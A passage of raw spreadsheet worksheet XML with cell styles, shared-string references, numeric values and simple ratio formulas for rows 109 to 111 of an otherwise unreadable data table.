      <c r="KJ109" s="127"/>
      <c r="KK109" s="127"/>
      <c r="KL109" s="127"/>
      <c r="KM109" s="127"/>
      <c r="KN109" s="127"/>
      <c r="KO109" s="127"/>
      <c r="KP109" s="127"/>
      <c r="KQ109" s="127"/>
      <c r="KR109" s="127"/>
      <c r="KS109" s="127"/>
      <c r="KT109" s="127"/>
      <c r="KU109" s="127"/>
      <c r="KV109" s="127"/>
      <c r="KW109" s="127"/>
      <c r="KX109" s="127"/>
      <c r="KY109" s="127"/>
      <c r="KZ109" s="127"/>
      <c r="LA109" s="127"/>
      <c r="LB109" s="127"/>
      <c r="LC109" s="127"/>
      <c r="LD109" s="127"/>
      <c r="LE109" s="127"/>
      <c r="LF109" s="127"/>
      <c r="LG109" s="127"/>
      <c r="LH109" s="127"/>
      <c r="LI109" s="127"/>
      <c r="LJ109" s="127"/>
      <c r="LK109" s="127"/>
      <c r="LL109" s="127"/>
      <c r="LM109" s="127"/>
      <c r="LN109" s="127"/>
      <c r="LO109" s="127"/>
      <c r="LP109" s="127"/>
      <c r="LQ109" s="127"/>
      <c r="LR109" s="127"/>
      <c r="LS109" s="127"/>
      <c r="LT109" s="127"/>
      <c r="LU109" s="127"/>
      <c r="LV109" s="127"/>
      <c r="LW109" s="127"/>
      <c r="LX109" s="127"/>
      <c r="LY109" s="127"/>
      <c r="LZ109" s="127"/>
      <c r="MA109" s="127"/>
      <c r="MB109" s="127"/>
      <c r="MC109" s="127"/>
      <c r="MD109" s="127"/>
      <c r="ME109" s="127"/>
      <c r="MF109" s="127"/>
      <c r="MG109" s="127"/>
      <c r="MH109" s="127"/>
      <c r="MI109" s="127"/>
      <c r="MJ109" s="127"/>
      <c r="MK109" s="127"/>
      <c r="ML109" s="127"/>
      <c r="MM109" s="127"/>
      <c r="MN109" s="127"/>
      <c r="MO109" s="127"/>
      <c r="MP109" s="127"/>
      <c r="MQ109" s="127"/>
      <c r="MR109" s="127"/>
      <c r="MS109" s="127"/>
      <c r="MT109" s="127"/>
      <c r="MU109" s="127"/>
      <c r="MV109" s="127"/>
      <c r="MW109" s="127"/>
      <c r="MX109" s="127"/>
      <c r="MY109" s="127"/>
      <c r="MZ109" s="127"/>
      <c r="NA109" s="127"/>
      <c r="NB109" s="127"/>
      <c r="NC109" s="127"/>
      <c r="ND109" s="127"/>
      <c r="NE109" s="127"/>
      <c r="NF109" s="127"/>
      <c r="NG109" s="127"/>
      <c r="NH109" s="127"/>
      <c r="NI109" s="127"/>
      <c r="NJ109" s="127"/>
      <c r="NK109" s="127"/>
      <c r="NL109" s="127"/>
      <c r="NM109" s="127"/>
      <c r="NN109" s="127"/>
      <c r="NO109" s="127"/>
      <c r="NP109" s="127"/>
      <c r="NQ109" s="127"/>
      <c r="NR109" s="127"/>
      <c r="NS109" s="127"/>
      <c r="NT109" s="127"/>
      <c r="NU109" s="127"/>
      <c r="NV109" s="127"/>
      <c r="NW109" s="127"/>
      <c r="NX109" s="127"/>
      <c r="NY109" s="127"/>
    </row>
    <row r="110" ht="153.75" customHeight="1">
      <c r="B110" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C110" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D110" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E110" s="90" t="s">
        <v>1848</v>
      </c>
      <c r="F110" s="90" t="s">
        <v>1849</v>
      </c>
      <c r="G110" s="90" t="s">
        <v>1850</v>
      </c>
      <c r="H110" s="90" t="s">
        <v>1851</v>
      </c>
      <c r="I110" s="92" t="s">
        <v>1852</v>
      </c>
      <c r="J110" s="92" t="s">
        <v>12</v>
      </c>
      <c r="K110" s="92" t="s">
        <v>1853</v>
      </c>
      <c r="L110" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M110" s="93">
        <v>9.0</v>
      </c>
      <c r="N110" s="93">
        <v>1.0</v>
      </c>
      <c r="O110" s="93">
        <v>0.0</v>
      </c>
      <c r="P110" s="93">
        <v>1.0</v>
      </c>
      <c r="Q110" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R110" s="93">
        <v>1.0</v>
      </c>
      <c r="S110" s="93">
        <v>0.0</v>
      </c>
      <c r="T110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U110" s="98" t="s">
        <v>269</v>
      </c>
      <c r="V110" s="155" t="s">
        <v>1854</v>
      </c>
      <c r="W110" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X110" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y110" s="96" t="s">
        <v>512</v>
      </c>
      <c r="Z110" s="132" t="s">
        <v>1855</v>
      </c>
      <c r="AA110" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB110" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC110" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD110" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE110" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF110" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AG110" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH110" s="99" t="s">
        <v>1856</v>
      </c>
      <c r="AI110" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ110" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK110" s="100" t="s">
        <v>1857</v>
      </c>
      <c r="AL110" s="100">
        <v>2.0</v>
      </c>
      <c r="AM110" s="100">
        <v>3.0</v>
      </c>
      <c r="AN110" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO110" s="100" t="s">
        <v>1857</v>
      </c>
      <c r="AP110" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ110" s="100">
        <v>3.0</v>
      </c>
      <c r="AR110" s="100" t="s">
        <v>1857</v>
      </c>
      <c r="AS110" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AT110" s="100" t="str">
        <f t="shared" si="164"/>
        <v>1292, 46983</v>
      </c>
      <c r="AU110" s="100">
        <v>1292.0</v>
      </c>
      <c r="AV110" s="100">
        <v>46983.0</v>
      </c>
      <c r="AW110" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AX110" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AY110" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ110" s="100">
        <v>0.0</v>
      </c>
      <c r="BA110" s="102">
        <v>9.0</v>
      </c>
      <c r="BB110" s="102">
        <v>1.0</v>
      </c>
      <c r="BC110" s="102">
        <v>3.0</v>
      </c>
      <c r="BD110" s="102">
        <v>3.0</v>
      </c>
      <c r="BE110" s="102">
        <v>0.0</v>
      </c>
      <c r="BF110" s="102">
        <v>0.0</v>
      </c>
      <c r="BG110" s="102">
        <v>0.0</v>
      </c>
      <c r="BH110" s="102">
        <v>0.0</v>
      </c>
      <c r="BI110" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ110" s="102">
        <v>3.0</v>
      </c>
      <c r="BK110" s="102">
        <v>3.0</v>
      </c>
      <c r="BL110" s="103">
        <f t="shared" ref="BL110:BL139" si="167">BB110/N110</f>
        <v>1</v>
      </c>
      <c r="BM110" s="103">
        <f t="shared" ref="BM110:BM139" si="168">BI110/N110</f>
        <v>1</v>
      </c>
      <c r="BN110" s="103">
        <f t="shared" ref="BN110:BN139" si="169">IF(BE110="-","-",BE110/N110)</f>
        <v>0</v>
      </c>
      <c r="BO110" s="103">
        <f t="shared" ref="BO110:BO139" si="170">BC110/P110</f>
        <v>3</v>
      </c>
      <c r="BP110" s="103">
        <f t="shared" ref="BP110:BP139" si="171">BJ110/P110</f>
        <v>3</v>
      </c>
      <c r="BQ110" s="103">
        <f t="shared" ref="BQ110:BQ139" si="172">IF(BG110="-","-",BG110/P110)</f>
        <v>0</v>
      </c>
      <c r="BR110" s="103">
        <f t="shared" ref="BR110:BR139" si="173">BD110/R110</f>
        <v>3</v>
      </c>
      <c r="BS110" s="103">
        <f t="shared" ref="BS110:BS139" si="174">BK110/R110</f>
        <v>3</v>
      </c>
      <c r="BT110" s="103">
        <f t="shared" ref="BT110:BT139" si="175">IF(BH110="-","-",BH110/R110)</f>
        <v>0</v>
      </c>
      <c r="BU110" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV110" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW110" s="104" t="s">
        <v>1857</v>
      </c>
      <c r="BX110" s="104">
        <v>2.0</v>
      </c>
      <c r="BY110" s="104">
        <v>3.0</v>
      </c>
      <c r="BZ110" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA110" s="104" t="s">
        <v>1857</v>
      </c>
      <c r="CB110" s="104">
        <v>2.0</v>
      </c>
      <c r="CC110" s="104">
        <v>3.0</v>
      </c>
      <c r="CD110" s="104">
        <v>1292.0</v>
      </c>
      <c r="CE110" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF110" s="104">
        <f t="shared" si="165"/>
        <v>1292</v>
      </c>
      <c r="CG110" s="104" t="s">
        <v>1857</v>
      </c>
      <c r="CH110" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI110" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ110" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK110" s="104">
        <v>0.0</v>
      </c>
      <c r="CL110" s="104">
        <v>0.0</v>
      </c>
      <c r="CM110" s="105">
        <v>2.0</v>
      </c>
      <c r="CN110" s="105">
        <v>1.0</v>
      </c>
      <c r="CO110" s="105">
        <v>2.0</v>
      </c>
      <c r="CP110" s="105">
        <v>3.0</v>
      </c>
      <c r="CQ110" s="105">
        <v>0.0</v>
      </c>
      <c r="CR110" s="105">
        <v>3.0</v>
      </c>
      <c r="CS110" s="105">
        <v>0.0</v>
      </c>
      <c r="CT110" s="105">
        <v>0.0</v>
      </c>
      <c r="CU110" s="105">
        <v>0.0</v>
      </c>
      <c r="CV110" s="105">
        <v>0.0</v>
      </c>
      <c r="CW110" s="105">
        <v>1.0</v>
      </c>
      <c r="CX110" s="105">
        <v>3.0</v>
      </c>
      <c r="CY110" s="105">
        <v>3.0</v>
      </c>
      <c r="CZ110" s="105">
        <v>0.0</v>
      </c>
      <c r="DA110" s="105">
        <v>3.0</v>
      </c>
      <c r="DB110" s="106">
        <f t="shared" ref="DB110:DB139" si="176">CN110/N110</f>
        <v>1</v>
      </c>
      <c r="DC110" s="106">
        <f t="shared" ref="DC110:DC139" si="177">CW110/N110</f>
        <v>1</v>
      </c>
      <c r="DD110" s="106">
        <f t="shared" ref="DD110:DD139" si="178">IF(CS110="-","-",CS110/N110)</f>
        <v>0</v>
      </c>
      <c r="DE110" s="106">
        <f t="shared" ref="DE110:DE139" si="179">CO110/P110</f>
        <v>2</v>
      </c>
      <c r="DF110" s="106">
        <f t="shared" ref="DF110:DF139" si="180">CX110/P110</f>
        <v>3</v>
      </c>
      <c r="DG110" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH110" s="106">
        <f t="shared" ref="DH110:DH139" si="181">IF(CR110="-","-",CR110/R110)</f>
        <v>3</v>
      </c>
      <c r="DI110" s="106">
        <f t="shared" ref="DI110:DI139" si="182">IF(DA110="-","-",DA110/R110)</f>
        <v>3</v>
      </c>
      <c r="DJ110" s="106">
        <f t="shared" ref="DJ110:DJ139" si="183">IF(CV110="-","-",CV110/R110)</f>
        <v>0</v>
      </c>
      <c r="DK110" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL110" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM110" s="108" t="s">
        <v>1858</v>
      </c>
      <c r="DN110" s="108">
        <v>3.0</v>
      </c>
      <c r="DO110" s="108">
        <v>7.0</v>
      </c>
      <c r="DP110" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ110" s="108" t="s">
        <v>1858</v>
      </c>
      <c r="DR110" s="108">
        <v>3.0</v>
      </c>
      <c r="DS110" s="108">
        <v>7.0</v>
      </c>
      <c r="DT110" s="108">
        <v>1292.0</v>
      </c>
      <c r="DU110" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV110" s="108">
        <f t="shared" si="166"/>
        <v>1292</v>
      </c>
      <c r="DW110" s="108" t="s">
        <v>1859</v>
      </c>
      <c r="DX110" s="166" t="s">
        <v>12</v>
      </c>
      <c r="DY110" s="166" t="s">
        <v>12</v>
      </c>
      <c r="DZ110" s="166" t="s">
        <v>12</v>
      </c>
      <c r="EA110" s="108">
        <v>0.0</v>
      </c>
      <c r="EB110" s="108">
        <v>0.0</v>
      </c>
      <c r="EC110" s="109">
        <v>9.0</v>
      </c>
      <c r="ED110" s="109">
        <v>1.0</v>
      </c>
      <c r="EE110" s="109">
        <v>4.0</v>
      </c>
      <c r="EF110" s="109">
        <v>4.0</v>
      </c>
      <c r="EG110" s="109">
        <v>0.0</v>
      </c>
      <c r="EH110" s="109">
        <v>4.0</v>
      </c>
      <c r="EI110" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ110" s="109">
        <v>0.0</v>
      </c>
      <c r="EK110" s="109">
        <v>0.0</v>
      </c>
      <c r="EL110" s="109">
        <v>0.0</v>
      </c>
      <c r="EM110" s="109">
        <v>1.0</v>
      </c>
      <c r="EN110" s="109">
        <v>4.0</v>
      </c>
      <c r="EO110" s="109">
        <v>4.0</v>
      </c>
      <c r="EP110" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ110" s="109">
        <v>4.0</v>
      </c>
      <c r="ER110" s="110">
        <f t="shared" ref="ER110:ER139" si="184">ED110/N110</f>
        <v>1</v>
      </c>
      <c r="ES110" s="110">
        <f t="shared" ref="ES110:ES139" si="185">EM110/N110</f>
        <v>1</v>
      </c>
      <c r="ET110" s="110">
        <f t="shared" ref="ET110:ET139" si="186">IF(EI110="-","-",EI110/N110)</f>
        <v>0</v>
      </c>
      <c r="EU110" s="110">
        <f t="shared" ref="EU110:EU139" si="187">EE110/P110</f>
        <v>4</v>
      </c>
      <c r="EV110" s="110">
        <f t="shared" ref="EV110:EV139" si="188">EN110/P110</f>
        <v>4</v>
      </c>
      <c r="EW110" s="110">
        <f t="shared" ref="EW110:EW139" si="189">IF(EK110="-","-",EK110/P110)</f>
        <v>0</v>
      </c>
      <c r="EX110" s="110">
        <f t="shared" ref="EX110:EX139" si="190">IF(EH110="-","-",EH110/R110)</f>
        <v>4</v>
      </c>
      <c r="EY110" s="110">
        <f t="shared" ref="EY110:EY139" si="191">IF(EQ110="-","-",EQ110/R110)</f>
        <v>4</v>
      </c>
      <c r="EZ110" s="110">
        <f t="shared" ref="EZ110:EZ139" si="192">IF(EL110="-","-",EL110/R110)</f>
        <v>0</v>
      </c>
      <c r="FA110" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB110" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC110" s="111" t="s">
        <v>1860</v>
      </c>
      <c r="FD110" s="111">
        <v>6.0</v>
      </c>
      <c r="FE110" s="111">
        <v>63.0</v>
      </c>
      <c r="FF110" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG110" s="111" t="s">
        <v>1861</v>
      </c>
      <c r="FH110" s="111">
        <v>4.0</v>
      </c>
      <c r="FI110" s="111">
        <v>6.0</v>
      </c>
      <c r="FJ110" s="111" t="s">
        <v>1862</v>
      </c>
      <c r="FK110" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL110" s="111" t="str">
        <f t="shared" si="155"/>
        <v>1292, 2101292, 2002752, 2002749</v>
      </c>
      <c r="FM110" s="111" t="s">
        <v>1861</v>
      </c>
      <c r="FN110" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO110" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP110" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ110" s="111">
        <v>0.0</v>
      </c>
      <c r="FR110" s="111">
        <v>0.0</v>
      </c>
      <c r="FS110" s="112">
        <v>2.0</v>
      </c>
      <c r="FT110" s="112">
        <v>2.0</v>
      </c>
      <c r="FU110" s="112">
        <v>40.0</v>
      </c>
      <c r="FV110" s="112">
        <v>4.0</v>
      </c>
      <c r="FW110" s="112">
        <v>56.0</v>
      </c>
      <c r="FX110" s="112">
        <v>58.0</v>
      </c>
      <c r="FY110" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ110" s="112">
        <v>0.0</v>
      </c>
      <c r="GA110" s="112">
        <v>0.0</v>
      </c>
      <c r="GB110" s="112">
        <v>0.0</v>
      </c>
      <c r="GC110" s="112">
        <v>1.0</v>
      </c>
      <c r="GD110" s="112">
        <v>4.0</v>
      </c>
      <c r="GE110" s="112">
        <v>4.0</v>
      </c>
      <c r="GF110" s="112">
        <v>2.0</v>
      </c>
      <c r="GG110" s="112">
        <v>4.0</v>
      </c>
      <c r="GH110" s="113">
        <f t="shared" ref="GH110:GH139" si="193">FT110/N110</f>
        <v>2</v>
      </c>
      <c r="GI110" s="113">
        <f t="shared" ref="GI110:GI139" si="194">GC110/N110</f>
        <v>1</v>
      </c>
      <c r="GJ110" s="113">
        <f t="shared" ref="GJ110:GJ139" si="195">IF(FY110="-","-",FY110/N110)</f>
        <v>0</v>
      </c>
      <c r="GK110" s="113">
        <f t="shared" ref="GK110:GK139" si="196">FU110/P110</f>
        <v>40</v>
      </c>
      <c r="GL110" s="113">
        <f t="shared" ref="GL110:GL139" si="197">GD110/P110</f>
        <v>4</v>
      </c>
      <c r="GM110" s="113">
        <f t="shared" ref="GM110:GM139" si="198">IF(GA110="-","-",GA110/P110)</f>
        <v>0</v>
      </c>
      <c r="GN110" s="113">
        <f t="shared" ref="GN110:GN139" si="199">IF(FX110="-","-",FX110/R110)</f>
        <v>58</v>
      </c>
      <c r="GO110" s="113">
        <f t="shared" ref="GO110:GO139" si="200">IF(GG110="-","-",GG110/R110)</f>
        <v>4</v>
      </c>
      <c r="GP110" s="113">
        <f t="shared" ref="GP110:GP139" si="201">IF(GB110="-","-",GB110/R110)</f>
        <v>0</v>
      </c>
      <c r="GQ110" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR110" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS110" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT110" s="94" t="s">
        <v>1863</v>
      </c>
      <c r="GU110" s="116" t="s">
        <v>1864</v>
      </c>
      <c r="GV110" s="116">
        <v>2.0</v>
      </c>
      <c r="GW110" s="116">
        <v>3.0</v>
      </c>
      <c r="GX110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD110" s="131" t="s">
        <v>1864</v>
      </c>
      <c r="HE110" s="131" t="s">
        <v>1864</v>
      </c>
      <c r="HF110" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG110" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH110" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI110" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ110" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK110" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL110" s="93">
        <v>1.0</v>
      </c>
      <c r="HM110" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN110" s="93">
        <v>1.0</v>
      </c>
      <c r="HO110" s="93">
        <v>0.0</v>
      </c>
      <c r="HP110" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ110" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR110" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS110" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT110" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU110" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV110" s="145" t="s">
        <v>1865</v>
      </c>
      <c r="HW110" s="119">
        <v>2.0</v>
      </c>
      <c r="HX110" s="119">
        <v>2.0</v>
      </c>
      <c r="HY110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC110" s="120" t="str">
        <f t="shared" si="162"/>
        <v>32296, 54790</v>
      </c>
      <c r="ID110" s="120" t="s">
        <v>1865</v>
      </c>
      <c r="IE110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH110" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II110" s="99" t="s">
        <v>1866</v>
      </c>
      <c r="IJ110" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK110" s="99">
        <v>195.0</v>
      </c>
      <c r="IL110" s="99">
        <v>0.0</v>
      </c>
      <c r="IM110" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN110" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO110" s="98">
        <v>1.0</v>
      </c>
      <c r="IP110" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ110" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR110" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS110" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT110" s="127"/>
      <c r="IU110" s="127"/>
      <c r="IV110" s="127"/>
      <c r="IW110" s="127"/>
      <c r="IX110" s="127"/>
      <c r="IY110" s="127"/>
      <c r="IZ110" s="127"/>
      <c r="JA110" s="127"/>
      <c r="JB110" s="127"/>
      <c r="JC110" s="127"/>
      <c r="JD110" s="127"/>
      <c r="JE110" s="127"/>
      <c r="JF110" s="127"/>
      <c r="JG110" s="127"/>
      <c r="JH110" s="127"/>
      <c r="JI110" s="127"/>
      <c r="JJ110" s="127"/>
      <c r="JK110" s="127"/>
      <c r="JL110" s="127"/>
      <c r="JM110" s="127"/>
      <c r="JN110" s="127"/>
      <c r="JO110" s="127"/>
      <c r="JP110" s="127"/>
      <c r="JQ110" s="127"/>
      <c r="JR110" s="127"/>
      <c r="JS110" s="127"/>
      <c r="JT110" s="127"/>
      <c r="JU110" s="127"/>
      <c r="JV110" s="127"/>
      <c r="JW110" s="127"/>
      <c r="JX110" s="127"/>
      <c r="JY110" s="127"/>
      <c r="JZ110" s="127"/>
      <c r="KA110" s="127"/>
      <c r="KB110" s="127"/>
      <c r="KC110" s="127"/>
      <c r="KD110" s="127"/>
      <c r="KE110" s="127"/>
      <c r="KF110" s="127"/>
      <c r="KG110" s="127"/>
      <c r="KH110" s="127"/>
      <c r="KI110" s="127"/>
      <c r="KJ110" s="127"/>
      <c r="KK110" s="127"/>
      <c r="KL110" s="127"/>
      <c r="KM110" s="127"/>
      <c r="KN110" s="127"/>
      <c r="KO110" s="127"/>
      <c r="KP110" s="127"/>
      <c r="KQ110" s="127"/>
      <c r="KR110" s="127"/>
      <c r="KS110" s="127"/>
      <c r="KT110" s="127"/>
      <c r="KU110" s="127"/>
      <c r="KV110" s="127"/>
      <c r="KW110" s="127"/>
      <c r="KX110" s="127"/>
      <c r="KY110" s="127"/>
      <c r="KZ110" s="127"/>
      <c r="LA110" s="127"/>
      <c r="LB110" s="127"/>
      <c r="LC110" s="127"/>
      <c r="LD110" s="127"/>
      <c r="LE110" s="127"/>
      <c r="LF110" s="127"/>
      <c r="LG110" s="127"/>
      <c r="LH110" s="127"/>
      <c r="LI110" s="127"/>
      <c r="LJ110" s="127"/>
      <c r="LK110" s="127"/>
      <c r="LL110" s="127"/>
      <c r="LM110" s="127"/>
      <c r="LN110" s="127"/>
      <c r="LO110" s="127"/>
      <c r="LP110" s="127"/>
      <c r="LQ110" s="127"/>
      <c r="LR110" s="127"/>
      <c r="LS110" s="127"/>
      <c r="LT110" s="127"/>
      <c r="LU110" s="127"/>
      <c r="LV110" s="127"/>
      <c r="LW110" s="127"/>
      <c r="LX110" s="127"/>
      <c r="LY110" s="127"/>
      <c r="LZ110" s="127"/>
      <c r="MA110" s="127"/>
      <c r="MB110" s="127"/>
      <c r="MC110" s="127"/>
      <c r="MD110" s="127"/>
      <c r="ME110" s="127"/>
      <c r="MF110" s="127"/>
      <c r="MG110" s="127"/>
      <c r="MH110" s="127"/>
      <c r="MI110" s="127"/>
      <c r="MJ110" s="127"/>
      <c r="MK110" s="127"/>
      <c r="ML110" s="127"/>
      <c r="MM110" s="127"/>
      <c r="MN110" s="127"/>
      <c r="MO110" s="127"/>
      <c r="MP110" s="127"/>
      <c r="MQ110" s="127"/>
      <c r="MR110" s="127"/>
      <c r="MS110" s="127"/>
      <c r="MT110" s="127"/>
      <c r="MU110" s="127"/>
      <c r="MV110" s="127"/>
      <c r="MW110" s="127"/>
      <c r="MX110" s="127"/>
      <c r="MY110" s="127"/>
      <c r="MZ110" s="127"/>
      <c r="NA110" s="127"/>
      <c r="NB110" s="127"/>
      <c r="NC110" s="127"/>
      <c r="ND110" s="127"/>
      <c r="NE110" s="127"/>
      <c r="NF110" s="127"/>
      <c r="NG110" s="127"/>
      <c r="NH110" s="127"/>
      <c r="NI110" s="127"/>
      <c r="NJ110" s="127"/>
      <c r="NK110" s="127"/>
      <c r="NL110" s="127"/>
      <c r="NM110" s="127"/>
      <c r="NN110" s="127"/>
      <c r="NO110" s="127"/>
      <c r="NP110" s="127"/>
      <c r="NQ110" s="127"/>
      <c r="NR110" s="127"/>
      <c r="NS110" s="127"/>
      <c r="NT110" s="127"/>
      <c r="NU110" s="127"/>
      <c r="NV110" s="127"/>
      <c r="NW110" s="127"/>
      <c r="NX110" s="127"/>
      <c r="NY110" s="127"/>
    </row>
    <row r="111" ht="153.75" customHeight="1">
      <c r="B111" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C111" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D111" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E111" s="90" t="s">
        <v>1848</v>
      </c>
      <c r="F111" s="90" t="s">
        <v>1849</v>
      </c>
      <c r="G111" s="90" t="s">
        <v>1867</v>
      </c>
      <c r="H111" s="90" t="s">
        <v>1868</v>
      </c>
      <c r="I111" s="92" t="s">
        <v>1869</v>
      </c>
      <c r="J111" s="92" t="s">
        <v>1870</v>
      </c>
      <c r="K111" s="92" t="s">
        <v>1871</v>
      </c>
      <c r="L111" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M111" s="93">
        <v>170.0</v>
      </c>
      <c r="N111" s="93">
        <v>1.0</v>
      </c>
      <c r="O111" s="93">
        <v>0.0</v>
      </c>
      <c r="P111" s="93">
        <v>1.0</v>
      </c>
      <c r="Q111" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R111" s="93">
        <v>1.0</v>
      </c>
      <c r="S111" s="93">
        <v>0.0</v>
      </c>
      <c r="T111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U111" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V111" s="161" t="s">
        <v>1872</v>
      </c>
      <c r="W111" s="96" t="s">
        <v>1873</v>
      </c>
      <c r="X111" s="132" t="s">
        <v>1874</v>
      </c>
      <c r="Y111" s="126" t="s">
        <v>1875</v>
      </c>
      <c r="Z111" s="132" t="s">
        <v>1855</v>
      </c>
      <c r="AA111" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB111" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC111" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD111" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE111" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF111" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG111" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH111" s="99" t="s">
        <v>1677</v>
      </c>
      <c r="AI111" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ111" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL111" s="100">
        <v>0.0</v>
      </c>
      <c r="AM111" s="100">
        <v>0.0</v>
      </c>
      <c r="AN111" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP111" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ111" s="100">
        <v>0.0</v>
      </c>
      <c r="AR111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT111" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX111" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY111" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ111" s="100">
        <v>0.0</v>
      </c>
      <c r="BA111" s="102">
        <v>170.0</v>
      </c>
      <c r="BB111" s="102">
        <v>0.0</v>
      </c>
      <c r="BC111" s="102">
        <v>0.0</v>
      </c>
      <c r="BD111" s="102">
        <v>0.0</v>
      </c>
      <c r="BE111" s="102">
